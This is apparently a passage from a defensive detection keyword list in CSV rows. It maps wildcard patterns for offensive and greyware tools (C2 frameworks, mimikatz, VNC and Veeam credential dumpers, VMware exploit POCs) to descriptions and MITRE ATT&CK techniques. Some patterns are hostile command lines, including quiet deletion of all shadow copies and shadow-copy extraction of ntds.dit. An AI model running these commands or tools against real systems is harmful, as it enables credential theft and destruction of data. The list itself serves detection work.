+"*vdi2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vectra-ai-research/MAAD-AF*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*veeam_credential_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*veeam_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*veeam_dump_mssql.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*veeam_dump_postgresql.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Vegile -*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","0","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*venv wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*Verified Merlin server *","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*verovaleros/domain_analyzer*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*victim_host_generator.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*VID_03EB&PID_2403 *","offensive_tool_keyword","ducky","rubber ducky","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki","1","0","default vid and pid of the device - risk of false positives","10","1","2","0","2015-03-15T02:45:33Z","2015-03-15T02:45:31Z" +"*VID_0483&PID_5740*","offensive_tool_keyword","FlipperZero","Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://docs.flipper.net/qflipper/windows-debug","1","0","default vid and pid of the device - risk of false positives","10","10","N/A","N/A","N/A","N/A" +"*viewdns-get-rootdomains-ip-ns *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*viewdns-get-rootdomains-whois *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*Villain.git*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*villain.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Villain/Core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*villain_core.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*vincent.letoux@gmail.com*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*viper/*.sock*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*viper-dev.conf*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*viperpython-dev*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*viperpython-main*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*viperzip.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*virajkulkarni14*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/virajkulkarni14","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Viralmaniar*","offensive_tool_keyword","Github Username","github username hosting post exploitation tools and recon tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Viralmaniar","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*VirTool:Win32/RemoteExec*","signature_keyword","Antivirus Signature","AV signature often associated with C2 communications (cobaltstrike for example)","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*virusscan_bypass.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*VirusTotalC2.*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" +"*Visual-Studio-BOF-template*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" +"*VITE_STRIKER_API*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*vivaldi* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A" +"*vivaldi.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" +"*VMSA-2023-0001.py*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"*vmware_view_planner*uploadlog_rce*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vmware_vrni_rce_cve_2023_20887.rb*","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" +"*vmware_workspace_one_access_cve_*.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*VMware-vRealize-Log-Insight.cert*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"*vmx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vnc_password_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vnc_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vncdumpdll*","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*vncinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vncpcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vncpwdump.*","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*vncviewer *.*:5901*","greyware_tool_keyword","vncviewer","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*vnperistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*volatility2 --profile=*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*volatility3 -f *.dmp*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*VPNPivot*","offensive_tool_keyword","VPNPivot","Sometime we do external penetration testing and when we compromise the remote target we would like to explore the internal network behind and getting such compromise like owning Active directory. accessing shared files. conducting MITM attacks ... etc","T1090 - T1095 - T1562 - T1201 - T1558","TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0x36/VPNPivot","1","1","N/A","N/A","3","256","52","2016-07-21T08:49:26Z","2015-08-26T18:44:42Z" +"*vRealizeLogInsightRCE*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"*vsf_sysutil_read_loop*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","1","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*vssadmin create shadow /for=C:*","greyware_tool_keyword","vssadmin","the command is used to create a new Volume Shadow Copy for a specific volume which can be utilized by an attacker to collect data from the local system","T1005","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*vssadmin create shadow /for=C:* \Temp\*.tmp*","greyware_tool_keyword","vssadmin","the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.","T1003.001 - T1567.001 - T1070.004","TA0005 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*vssadmin list shadows*","greyware_tool_keyword","vssadmin","List shadow copies using vssadmin","T1059.003 - T1059.001 - T1005","TA0002 - TA0005 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*vssadmin* Delete Shadows /All /Quiet*","greyware_tool_keyword","vssadmin","Deletes all Volume Shadow Copies from the system quietly (without prompts).","T1490","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*vssenum.x64.*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 